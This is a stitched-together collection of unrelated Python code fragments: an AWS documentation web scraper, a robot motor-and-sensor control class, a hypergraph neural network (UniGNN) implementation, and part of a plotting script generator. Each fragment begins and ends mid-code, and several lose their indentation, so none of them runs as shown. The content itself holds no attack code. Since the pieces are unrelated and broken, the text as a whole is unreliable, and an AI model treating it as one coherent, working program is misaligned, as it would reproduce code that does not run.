                if len(st) > 0
                and (st.startswith("AWS")
                     or st.startswith("Amazon")
                     or st.endswith("Documentation")
                     or st.endswith("User Guide"))
            ]
        except AttributeError:
            sections_titles = []
        print(f"  Extra (section names): {sections_titles}")
        extra_names += sections_titles
        # Dig into the first link of the page to get more content
        # (typically a 'User Guide' or 'Developer Guide')
        # Not all tiles have hrefs. Get the first one that does.
        # BUG FIX: default to "" so that, when no tile has an href, the
        # code below takes the empty-soup path instead of raising
        # NameError on an unbound variable.
        service_first_href = ""
        service_hrefs = service_soup.find_all("tile")
        for sh in service_hrefs:
            try:
                service_first_href = sh["href"]
                break
            except KeyError:
                continue
        # Discard URL parameters if they exist
        if "?" in service_first_href:
            service_first_href = service_first_href.split("?")[0]
        print(f"  Fetching {service_first_href}...")
        # Skip absolute product links (non-docs sites)
        if service_first_href.startswith("/"):
            # The page has no XML layout, it's pure HTML
            sleep(0.5)
            service_first_url = urllib.parse.urljoin(main_url, service_first_href)
            r = get(service_first_url)
            service_first_soup = BeautifulSoup(r.text, "html.parser")
        else:
            # Hack-ish way to set the result to nothing, so the next steps
            # will skip but the product will still get added to the dict.
            service_first_soup = BeautifulSoup("", "html.parser")
        # The page can sometimes be a placeholder with a redirect:
        # The last index.html will be replaced by the page in <meta http-equiv="refresh">
        # as in: <meta http-equiv="refresh" content="10;URL=concepts.html"
        # e.g. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/index.html to:
        # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
        meta_refresh = service_first_soup.find("meta", attrs={"http-equiv": "refresh"})
        if meta_refresh:
            index = meta_refresh["content"].split("=")[1]
            # Re-request the above with the right redirected URL
            if service_first_url.endswith("/"):
                # e.g. "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/"
                # Just add the new index
                service_first_url = service_first_url + index
            else:
                # e.g. "https://docs.aws.amazon.com/sagemaker/latest/dg/what-is.htm"
                # replace the last page of the path.
                service_first_url = re.sub(r"([^/]+)$", index, service_first_url)
            sleep(0.5)
            r = get(service_first_url)
            service_first_soup = BeautifulSoup(r.text, "html.parser")
        # Get the first <p>. If it's too short, get the next and so on
        paragraphs = service_first_soup.find_all("p")
        for p in paragraphs:
            clean_p = " ".join(p.text.split())
            if len(clean_p) < 100:
                continue
            # 'desc' obtained from HTML can have weird encoding
            # fix: https://stackoverflow.com/a/66815577
            bytes_desc = bytes(clean_p, encoding="raw_unicode_escape")
            service["desc"] = bytes_desc.decode("utf-8", "strict")
            break
        # <dt> elements often contain extra AWS product names!
        # Only if they start with "AWS", "Amazon" or the product name itself
        # (from the main page, w/o a brand prefix, e.g. "SageMaker")
        # BUG FIX: parenthesise the or-chain so the 4-word length cap
        # applies to every candidate, not only to the last branch.
        dts = service_first_soup.find_all("dt")
        dts_list = [
            dt.text
            for dt in dts
            if (dt.text.startswith("AWS")
                or dt.text.startswith("Amazon")
                or dt.text.startswith(name))
            and not len(dt.text.split()) > 4
        ]
        # Clean
        dts_list = [" ".join(dt.split()) for dt in dts_list]
        print(f"  Extra (terms): {dts_list}")
        extra_names += dts_list
        names.append(name)
        items.append(service)
    # Add the 'extra_names' as new product entries (name only)
    existing_names = [i["name"] for i in items]
    extra_names = list(set(extra_names))
    for en in extra_names:
        # Clean
        en = " ".join(en.split())
        if en in existing_names:
            continue
        service = {"name": en, "blurb": "", "abbreviation": "", "desc": ""}
        items.append(service)
    return items
def get_page_xml(url) -> str:
r = get(url)
soup = BeautifulSoup(r.text, "html.parser")
script_tags = soup.select("script")
for s in script_tags:
if not s.string:
continue
match = re.search(
r"landingPageXml | |
#!/usr/bin/env python
# coding: utf-8
#==================================================================================================#
# #
# FILE : room_seeker_l1.py #
# Memo : RoomSeeker level 1 node class #
# #
# Updated : 2021/01/09 Started this project based on "turtlebot3_core_v2.py" #
# プロジェクトから分離して独立したモジュールとする #
# "arduino_motor_control"クラスを"RoomSeekerLevel1"に名前変更 #
# 2021/01/16 モーターコントロールノードを追加し始める #
# 2021/01/18 Added inverse kinematics program #
# 2021/01/21 Added sensor node communication program #
# 2021/01/28 Bug fix in reading process from sensor node #
# #
# (C) 2020 <NAME> #
# #
#==================================================================================================#
#==================================================================================================#
# Import Module #
#==================================================================================================#
import numpy as np # For matrix calculation
from math import * # For mathematical operation
#==================================================================================================#
# Constants #
#==================================================================================================#
# PS2 controller constants
# Bit masks into the 16-bit PS2 controller button word.
PSB_SELECT = 0x0001
PSB_L3 = 0x0002
PSB_R3 = 0x0004
PSB_START = 0x0008
PSB_PAD_UP = 0x0010
PSB_PAD_RIGHT = 0x0020
PSB_PAD_DOWN = 0x0040
PSB_PAD_LEFT = 0x0080
PSB_L2 = 0x0100
PSB_R2 = 0x0200
PSB_L1 = 0x0400
PSB_R1 = 0x0800
# Colour names for the four shape buttons; these intentionally
# duplicate the TRIANGLE/CIRCLE/CROSS/SQUARE masks below.
PSB_GREEN = 0x1000
PSB_RED = 0x2000
PSB_BLUE = 0x4000
PSB_PINK = 0x8000
PSB_TRIANGLE = 0x1000
PSB_CIRCLE = 0x2000
PSB_CROSS = 0x4000
PSB_SQUARE = 0x8000
# Control Mode constants
# MODE_TWIST: velocity commands arrive as ROS twist messages;
# MODE_PS2: commands come from the PS2 controller sticks.
MODE_TWIST = 0
MODE_PS2 = 1
#==================================================================================================#
# Descriminate the literal is integer or not #
#==================================================================================================#
def is_int(s):
    """Return True when the literal *s* parses as a decimal integer."""
    try:
        int(s)
    except ValueError:
        return False
    return True
#==================================================================================================#
# Descriminate the literal is Hexadecimal or not #
#==================================================================================================#
def is_hex(s):
    """Return True when the literal *s* parses as a hexadecimal integer."""
    try:
        int(s, 16)
    except ValueError:
        return False
    return True
#==================================================================================================#
# RoomSeeker level 1 class #
# Index of each wheelspace value : 0 - Front Right, 1 - Fron Left, 2 - Rear Right, 3 - Rear Left #
# Index of each workspace value : 0 - Long dir, 1 - Width dir, 2 - Yaw angle #
#==================================================================================================#
class RoomSeekerLevel1():
def __init__(self):
self.mode = MODE_TWIST # Controll mode 0 : command mode , 1 : PS2 controller mode
self.sample_num_node_MEGA = 0 # Sample number of the Arduino MEGA
self.sample_num_node_FM = 0 # Sample number of the Front Motor Controller
self.sample_num_node_RM = 0 # Sample number of the Rear Motor Controller
self.sample_num_host = 0 # Sample number of the host
self.sample_num_ul = 999 # Upper limit of sample number
self.sample_num_ll = 0 # Lower limit of sample number
self.dt = 0.01 # Sampling time of the motor controller
#self.dt = 0.1 # Sampling time of the motor controller
self.ros_rate = 1/self.dt # Set value for rospy.Rate()
self.ws_dir = np.array([-1.0, 1.0, -1.0, 1.0]) # Wheelspace direction co-efficient
self.cnt_now = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel encoder counted value
self.omega_res = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity response [rad/s]
self.omega_res_x10 = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity response [10^-1deg/s]
self.omega_cmd = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity command [rad/s]
self.omega_cmd_x10 = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity command [10^-1deg/s]
self.vout = np.array([0, 0, 0, 0]) # Voltage output (PWM width : 0 - 4095)
self.x_res = np.array([0.0, 0.0, 0.0]) # Workspace pose response calculated from velocity response [0:m, 1:m, 2:rad]
self.x_res_ = np.array([0.0, 0.0, 0.0]) #
self.x_res2 = np.array([0.0, 0.0, 0.0]) # Workspace pose response calculated from velocity command [0:m, 1:m, 2:rad]
self.dx_res = np.array([0.0, 0.0, 0.0]) # Workspace velocity response [0 : m/s, 1 : m/s, 2 : deg/s]
self.dx_res_x10 = np.array([0.0, 0.0, 0.0]) # Workspace velocity response [0 : 10^-1m/s, 1 : 10^-1m/s, 2 : 10^-2deg/s]
self.x_cmd = np.array([0.0, 0.0, 0.0]) # Workspace pose command [0:m, 1:m, 2:rad]
self.dx_cmd = np.array([0.0, 0.0, 0.0]) # Workspace velocity command [0 : m/s, 1 : m/s, 2 : rad/s]
self.dx_rate_limit = np.array([0.010, 0.010, 0.050])# Rate limit value in workspace [0 : m/20ms, 1 : m/20ms, 2 : rad/20ms]
self.dx_cmd_rl = np.array([0.0, 0.0, 0.0]) # Workspace velocity command applied rate limit [0 : m/s, 1 : m/s, 2 : rad/s]
self.dx_cmd_x10 = np.array([0.0, 0.0, 0.0]) # Workspace velocity command x10ver [0 : 10^-1m/s, 1 : 10^-1m/s, 2 : 10^-2deg/s]
self.wheel_radius = 45.0 # Robot wheel radius [mm]
self.base_width = 215.0 # Robot wheel base width [mm]
self.base_length = 162.0 # Robot wheel base length (between front and rear wheel shaft) [mm]
self.J_inv = np.array([[1.0/(self.wheel_radius/1000.0), 1.0/(self.wheel_radius/1000.0), ((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)] # Inverse jacobian
,[1.0/(self.wheel_radius/1000.0), -1.0/(self.wheel_radius/1000.0), -((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]
,[1.0/(self.wheel_radius/1000.0), -1.0/(self.wheel_radius/1000.0), ((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]
,[1.0/(self.wheel_radius/1000.0), 1.0/(self.wheel_radius/1000.0), -((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]])
self.J_inv_plus = np.dot(np.linalg.inv(np.dot(self.J_inv.transpose(), self.J_inv)), self.J_inv.transpose())
self.x_ul = [ 5000.0, 5000.0, 5000.0] # Upper limit of the Workspace
self.x_ll = [-5000.0, -5000.0, -5000.0] # Lower limit of the Workspace
self.ir_hex = 0 # Ir sensor date in hex
self.ax = 0 # Acc x-axis
self.ay = 0 # Acc y-axis
self.az = 0 # Acc z-axis
self.gc = -0.06097 / 180.0 * 3.141592 # Gyro constants to transform raw data to rad/s [rad/s]
self.gx = 0 # Gyro x-axis [rad/s]
self.gy = 0 # Gyro y-axis [rad/s]
self.gz = 0 # Gyro z-axis [rad/s]
self.gz_hpf = 0.0 # Gyro z-axis applied HPF [rad/s]
self.gz_hpf_tmp = 0.0 # Temporary for HPF [rad/s]
self.int_gz_hpf = 0.0 # Integral of gz applied HPF [rad]
self.g_gz = 1.0 # Cutoff angular frequency of HPF for gyro sensor [rad/s]
self.mx = 0 # Mag x-axis
self.my = 0 # Mag y-axis
self.mz = 0 # Mag z-axis
self.mx_lpf = 0 # Mag x-axis applied LPF
self.my_lpf = 0 # Mag y-axis applied LPF
self.mz_lpf = 0 # Mag z-axis applied LPF
#self.mx_offset = 27.715769 # Offset of Mag x-axis
self.mx_offset = 70.0 # Offset of Mag x-axis
#self.my_offset = -81.559509 # Offset of Mag y-axis
self.my_offset = -25.0 # Offset of Mag y-axis
self.mz_offset = 0.0 # Offset of Mag y-axis
self.mr_offset = 177.26162 # Radius of Mag x-y circle
self.g_mag = 1.0 # Cutoff angular frequency of LPF for magnetosensor [rad/s]
self.temp = 0 # Temperature
self.us_dist = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) # Distance from ultra sonic sensor
self.us_ok = 0 # Ultrasonic sensor is enabled or not
self.ps2_button = 0 # PS2 controller button state
self.ps2_analogRX = 0 # PS2 controller button state
self.ps2_analogRY = 0 # PS2 controller button state
self.ps2_analogLX = 0 # PS2 controller button state
self.ps2_analogRY = 0 # PS2 controller button state
self.conFM = 0 # Serial console connected to arduino motor controller
self.conRM = 0 # Serial console connected to arduino motor controller
self.conMEGA = 0 # Serial console connected to arduino motor controller
self.bat_vol = 0 # Battery voltage
self.bat_vol_x100 = 0 # Battery voltage x100 (raw data)
self.ps2_ctrl = 0 # PS2 controller is enabled or not
self.interval_MEGA = 0 # Interval between samples
self.interval_FM = 0 # Interval between samples
self.interval_RM = 0 # Interval between samples
self.interval = 0 # Interval
self.pi = 3.141592
self.kkk = 0
self.before_nokoriMEGA = ''
self.before_nokoriFM = ''
self.before_nokoriRM = ''
# Power control
self.control_on = 0
self.no_input_from_ps2 = 0
self.no_input_from_ps2_cnt = 0
self.no_input_from_twist = 0
self.no_input_from_twist_cnt = 0
    def print_state(self):
        """Print the motor-control state to stdout: latest sample number,
        encoder counts, wheel velocity response/command (x10 raw units),
        PWM outputs and the workspace velocity command."""
        print('sample_num_node = ' + str(self.sample_num_node_FM))
        print('cnt_now = ' + str(self.cnt_now[0]) + ', ' + str(self.cnt_now[1]) + ', ' + str(self.cnt_now[2]) + ', ' + str(self.cnt_now[3]))
        print('omega_res_x10 = ' + str(self.omega_res_x10[0]) + ', ' + str(self.omega_res_x10[1]) + ', ' + str(self.omega_res_x10[2]) + ', ' + str(self.omega_res_x10[3]))
        print('omega_cmd_x10 = ' + str(self.omega_cmd_x10[0]) + ', ' + str(self.omega_cmd_x10[1]) + ', ' + str(self.omega_cmd_x10[2]) + ', ' + str(self.omega_cmd_x10[3]))
        print('vout = ' + str(self.vout[0]) + ', ' + str(self.vout[1]) + ', ' + str(self.vout[2]) + ', ' + str(self.vout[3]))
        print('dx_cmd_x10 = ' + str(self.dx_cmd_x10[0]) + ', ' + str(self.dx_cmd_x10[1]) + ', ' + str(self.dx_cmd_x10[2]))
def print_sensor(self):
print('sample_num_node_MEGA = ' + str(self.sample_num_node_MEGA))
print('ir_hex = ' + hex(self.ir_hex) + ', ir_bin = ' + bin(self.ir_hex))
print('ax = ' + '{:=+6}'.format(int(self.ax)) + ', ay = ' + '{:=+6}'.format(int(self.ay)) + ', az = ' + '{:=+6}'.format(int(self.az)))
print('gx = ' + '{:=+6}'.format(int(self.gx)) + ', gy = ' + '{:=+6}'.format(int(self.gy)) + ', gz = ' + '{:=+6}'.format(int(self.gz)))
print('mx = ' + '{:=+6}'.format(int(self.mx)) + ', my = ' + '{:=+6}'.format(int(self.my)) + ', mz = ' + '{:=+6}'.format(int(self.mz)) + ', temp = {:=+6}'.format(int(self.temp)))
print('us_dist = ' + '{:=5}'.format(int(self.us_dist[0])) + ', ' + '{:=6}'.format(int(self.us_dist[2])) + ', ' + '{:=6}'.format(int(self.us_dist[2])) + ', ' + '{:=6}'.format(int(self.us_dist[3])))
print('us_dist = ' + '{:=5}'.format(int(self.us_dist[4])) + ', ' + '{:=6}'.format(int(self.us_dist[5])) + ', ' + '{:=6}'.format(int(self.us_dist[6])) + ', ' + '{:=6}'.format(int(self.us_dist[7])))
print('us_ok = ' | |
# model/UniGNN.py (repo: czc567/UniGNN)
import torch
import torch.nn as nn, torch.nn.functional as F
from torch.nn.parameter import Parameter
import math
from torch_scatter import scatter
from torch_geometric.utils import softmax
# NOTE: can not tell which implementation is better statistically
def glorot(tensor):
    """Glorot/Xavier uniform initialisation in place; no-op for None."""
    if tensor is None:
        return
    bound = math.sqrt(6.0 / (tensor.size(-2) + tensor.size(-1)))
    tensor.data.uniform_(-bound, bound)
def normalize_l2(X):
    """Row-normalize matrix (zero rows stay zero instead of NaN)."""
    row_norms = X.detach().norm(dim=1, keepdim=True)
    inv_norms = row_norms.pow(-1)
    # A zero row yields an infinite inverse norm; map it back to zero.
    inv_norms[torch.isinf(inv_norms)] = 0.
    return X * inv_norms
# v1: X -> XW -> AXW -> norm
class UniSAGEConv(nn.Module):
    """UniSAGE hyperedge convolution.

    Projects vertex features, aggregates them over hyperedges, scatters
    the edge features back to vertices and adds the result as a
    residual to the projection: X -> XW -> XW + A(XW) -> norm.
    """

    def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
        super().__init__()
        # TODO: bias?
        self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
        self.heads = heads
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.negative_slope = negative_slope
        self.dropout = dropout
        self.args = args

    def __repr__(self):
        return '{}({}, {}, heads={})'.format(self.__class__.__name__,
                                             self.in_channels,
                                             self.out_channels, self.heads)

    def forward(self, X, vertex, edges):
        num_vertices = X.shape[0]
        # X0 = X # NOTE: reserved for skip connection
        projected = self.W(X)
        # Vertex -> edge aggregation over each incidence.
        per_incidence = projected[vertex]                                # [nnz, C]
        edge_feats = scatter(per_incidence, edges, dim=0,
                             reduce=self.args.first_aggregate)           # [E, C]
        # Edge -> vertex aggregation back onto the vertices.
        broadcast = edge_feats[edges]                                    # [nnz, C]
        neighbour_feats = scatter(broadcast, vertex, dim=0,
                                  reduce=self.args.second_aggregate,
                                  dim_size=num_vertices)                 # [N, C]
        out = projected + neighbour_feats
        if self.args.use_norm:
            out = normalize_l2(out)
        # NOTE: concat heads or mean heads?
        # NOTE: normalize here?
        # NOTE: skip concat here?
        return out
# v1: X -> XW -> AXW -> norm
class UniGINConv(nn.Module):
    """UniGIN hyperedge convolution.

    GIN-style update: project vertex features, aggregate over
    hyperedges, sum back to vertices, and combine as
    (1 + eps) * XW + A(XW), with eps learnable.
    """

    def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
        super().__init__()
        self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
        self.heads = heads
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.negative_slope = negative_slope
        self.dropout = dropout
        # Learnable GIN epsilon, initialised to zero.
        self.eps = nn.Parameter(torch.Tensor([0.]))
        self.args = args

    def __repr__(self):
        return '{}({}, {}, heads={})'.format(self.__class__.__name__,
                                             self.in_channels,
                                             self.out_channels, self.heads)

    def forward(self, X, vertex, edges):
        num_vertices = X.shape[0]
        # X0 = X # NOTE: reserved for skip connection
        # v1: X -> XW -> AXW -> norm
        projected = self.W(X)
        per_incidence = projected[vertex]                                # [nnz, C]
        edge_feats = scatter(per_incidence, edges, dim=0,
                             reduce=self.args.first_aggregate)           # [E, C]
        broadcast = edge_feats[edges]                                    # [nnz, C]
        neighbour_sum = scatter(broadcast, vertex, dim=0, reduce='sum',
                                dim_size=num_vertices)                   # [N, C]
        out = (1 + self.eps) * projected + neighbour_sum
        if self.args.use_norm:
            out = normalize_l2(out)
        # NOTE: concat heads or mean heads?
        # NOTE: normalize here?
        # NOTE: skip concat here?
        return out
# v1: X -> XW -> AXW -> norm
class UniGCNConv(nn.Module):
    """UniGCN hyperedge convolution.

    v1 variant: X -> XW -> AXW -> norm, with degree scalings degE
    (edge side) and degV (vertex side) taken from args.
    """

    def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
        super().__init__()
        self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
        self.heads = heads
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.negative_slope = negative_slope
        self.dropout = dropout
        self.args = args

    def __repr__(self):
        return '{}({}, {}, heads={})'.format(self.__class__.__name__,
                                             self.in_channels,
                                             self.out_channels, self.heads)

    def forward(self, X, vertex, edges):
        num_vertices = X.shape[0]
        # Precomputed degree normalisations.
        degE, degV = self.args.degE, self.args.degV
        # v1: X -> XW -> AXW -> norm
        projected = self.W(X)
        edge_feats = scatter(projected[vertex], edges, dim=0,
                             reduce=self.args.first_aggregate)           # [E, C]
        edge_feats = edge_feats * degE
        vertex_feats = scatter(edge_feats[edges], vertex, dim=0,
                               reduce='sum', dim_size=num_vertices)      # [N, C]
        out = vertex_feats * degV
        if self.args.use_norm:
            out = normalize_l2(out)
        # NOTE: skip concat here?
        return out
# v2: X -> AX -> norm -> AXW
class UniGCNConv2(nn.Module):
    """UniGCN hyperedge convolution, variant 2.

    Aggregates first and projects last: X -> AX -> norm -> (AX)W.
    Unlike UniGCNConv, the linear layer has a bias.
    """

    def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2):
        super().__init__()
        self.W = nn.Linear(in_channels, heads * out_channels, bias=True)
        self.heads = heads
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.negative_slope = negative_slope
        self.dropout = dropout
        self.args = args

    def __repr__(self):
        return '{}({}, {}, heads={})'.format(self.__class__.__name__,
                                             self.in_channels,
                                             self.out_channels, self.heads)

    def forward(self, X, vertex, edges):
        num_vertices = X.shape[0]
        # Precomputed degree normalisations.
        degE, degV = self.args.degE, self.args.degV
        # v3: X -> AX -> norm -> AXW
        edge_feats = scatter(X[vertex], edges, dim=0,
                             reduce=self.args.first_aggregate)           # [E, C]
        edge_feats = edge_feats * degE
        vertex_feats = scatter(edge_feats[edges], vertex, dim=0,
                               reduce='sum', dim_size=num_vertices)      # [N, C]
        out = vertex_feats * degV
        if self.args.use_norm:
            out = normalize_l2(out)
        out = self.W(out)
        # NOTE: result might be slighly unstable
        # NOTE: skip concat here?
        return out
class UniGATConv(nn.Module):
    """UniGAT hyperedge convolution with edge-level attention.

    Attention logits are computed from the aggregated edge features
    only (``att_v`` is allocated and initialised but not used in
    ``forward``; per the inline note, the edge-only score is the
    recommended variant).
    """
    def __init__(self, args, in_channels, out_channels, heads=8, dropout=0., negative_slope=0.2, skip_sum=False):
        super().__init__()
        self.W = nn.Linear(in_channels, heads * out_channels, bias=False)
        # Attention parameters; att_v is currently unused in forward.
        self.att_v = nn.Parameter(torch.Tensor(1, heads, out_channels))
        self.att_e = nn.Parameter(torch.Tensor(1, heads, out_channels))
        self.heads = heads
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.attn_drop = nn.Dropout(dropout)
        self.leaky_relu = nn.LeakyReLU(negative_slope)
        # When True, add the projected input back as a residual.
        self.skip_sum = skip_sum
        self.args = args
        self.reset_parameters()
    def __repr__(self):
        return '{}({}, {}, heads={})'.format(self.__class__.__name__,
                                             self.in_channels,
                                             self.out_channels, self.heads)
    def reset_parameters(self):
        """Glorot-initialise both attention parameter tensors."""
        glorot(self.att_v)
        glorot(self.att_e)
    def forward(self, X, vertex, edges):
        """Attend over each vertex's incident hyperedges and aggregate."""
        H, C, N = self.heads, self.out_channels, X.shape[0]
        # X0 = X # NOTE: reserved for skip connection
        X0 = self.W(X)
        X = X0.view(N, H, C)
        # Vertex -> edge aggregation per incidence.
        Xve = X[vertex] # [nnz, H, C]
        Xe = scatter(Xve, edges, dim=0, reduce=self.args.first_aggregate) # [E, H, C]
        # Edge-level attention logits, broadcast back to incidences.
        alpha_e = (Xe * self.att_e).sum(-1) # [E, H, 1]
        a_ev = alpha_e[edges]
        alpha = a_ev # Recommended to use this (edge-only score)
        alpha = self.leaky_relu(alpha)
        # Normalise logits over each vertex's incident edges.
        alpha = softmax(alpha, vertex, num_nodes=N)
        alpha = self.attn_drop( alpha )
        alpha = alpha.unsqueeze(-1)
        # Attention-weighted edge -> vertex aggregation.
        Xev = Xe[edges] # [nnz, H, C]
        Xev = Xev * alpha
        Xv = scatter(Xev, vertex, dim=0, reduce='sum', dim_size=N) # [N, H, C]
        X = Xv
        X = X.view(N, H * C)
        if self.args.use_norm:
            X = normalize_l2(X)
        if self.skip_sum:
            X = X + X0
        # NOTE: concat heads or mean heads?
        # NOTE: skip concat here?
        return X
# Registry mapping args.model_name to the corresponding convolution class.
__all_convs__ = {
    'UniGAT': UniGATConv,
    'UniGCN': UniGCNConv,
    'UniGCN2': UniGCNConv2,
    'UniGIN': UniGINConv,
    'UniSAGE': UniSAGEConv,
}
class UniGNN(nn.Module):
    def __init__(self, args, nfeat, nhid, nclass, nlayer, nhead, V, E):
        """UniGNN

        Args:
            args (NamedTuple): global args
            nfeat (int): dimension of features
            nhid (int): dimension of hidden features; the effective width is #nhid x #nhead
            nclass (int): number of classes
            nlayer (int): number of hidden layers
            nhead (int): number of conv heads
            V (torch.long): row index of the sparse incidence matrix H, |V| x |E|
            E (torch.long): col index of the sparse incidence matrix H, |V| x |E|
        """
        super().__init__()
        Conv = __all_convs__[args.model_name]
        self.conv_out = Conv(args, nhid * nhead, nclass, heads=1, dropout=args.attn_drop)
        # First layer maps nfeat -> nhid; the remaining nlayer-2 hidden
        # layers map (nhid * nhead) -> nhid.
        hidden = [Conv(args, nfeat, nhid, heads=nhead, dropout=args.attn_drop)]
        hidden += [Conv(args, nhid * nhead, nhid, heads=nhead, dropout=args.attn_drop)
                   for _ in range(nlayer - 2)]
        self.convs = nn.ModuleList(hidden)
        self.V = V
        self.E = E
        self.act = {'relu': nn.ReLU(), 'prelu': nn.PReLU()}[args.activation]
        self.input_drop = nn.Dropout(args.input_drop)
        self.dropout = nn.Dropout(args.dropout)
        self.type_norm = args.type_norm
        self.num_groups = args.num_groups
        self.skip_weight = args.skip_weight
        # Only group-style norms use a skip connection inside batch_norm.
        skip_connect = self.type_norm not in ['None', 'batch', 'pair']
        self.layers_bn = torch.nn.ModuleList([
            batch_norm(nhid * nhead, self.type_norm, skip_connect,
                       self.num_groups, self.skip_weight,
                       args.skipweight_learnable)
            for _ in range(nlayer - 1)
        ])

    def forward(self, X):
        """Run all hidden conv/norm/act/dropout stages, then the output
        conv, and return log-probabilities per class."""
        X = self.input_drop(X)
        for conv, bn in zip(self.convs, self.layers_bn):
            X = self.dropout(self.act(bn(conv(X, self.V, self.E))))
        X = self.conv_out(X, self.V, self.E)
        return F.log_softmax(X, dim=1)
class UniGCNIIConv(nn.Module):
    """UniGCNII convolution: degree-normalised hyperedge aggregation
    followed by the GCNII initial-residual (alpha) and identity-mapping
    (beta) combination."""

    def __init__(self, args, in_features, out_features):
        super().__init__()
        self.W = nn.Linear(in_features, out_features, bias=False)
        self.args = args

    def forward(self, X, vertex, edges, alpha, beta, X0):
        num_vertices = X.shape[0]
        # Precomputed degree normalisations.
        degE, degV = self.args.degE, self.args.degV
        # Vertex -> edge -> vertex propagation with degree scaling.
        edge_feats = scatter(X[vertex], edges, dim=0,
                             reduce=self.args.first_aggregate) * degE    # [E, C]
        aggregated = scatter(edge_feats[edges], vertex, dim=0,
                             reduce='sum', dim_size=num_vertices) * degV # [N, C]
        if self.args.use_norm:
            aggregated = normalize_l2(aggregated)
        # Initial residual towards X0, then identity mapping through W.
        residual = (1 - alpha) * aggregated + alpha * X0
        return (1 - beta) * residual + beta * self.W(residual)
class UniGCNII(nn.Module):
def __init__(self, args, nfeat, nhid, nclass, nlayer, nhead, V, E):
"""UniGNNII
Args:
args (NamedTuple): global args
nfeat (int): dimension of features
nhid (int): dimension of hidden features, note that actually it\'s #nhid x #nhead
nclass (int): number of classes
nlayer (int): number of hidden layers
nhead (int): number of conv heads
V (torch.long): V is the row index for the sparse incident matrix H, |V| x |E|
E (torch.long): E is the col index for the sparse incident matrix H, |V| x |E|
| |
\''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post2D.bsh', 'w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion +
' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post2D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+ str(right_margin+0.15)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+ str(right_margin+0.02)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \'' +
labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(
' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None:
outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(
' --new-zaxis zvalues /location right /bar_size \'0.5cm\'\\\n')
outfile.write(
" --label-style zvalues /angle 270 /shift 0.4 /valign 'midheight'\\\n")
outfile.write(' --plot '+currentParse+'_post2D.ct2@1:2:3 ')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write('/zaxis zvalues ')
outfile.write(
'/color-map \''+colours.value.colourMap(mainContourLevels, 'post')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in secContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonPostContourColour2D +
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(dirs.secParseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour +
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.secParseFilename, plot, 'post', lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour +
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in mainContourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainPostContourColour2D +
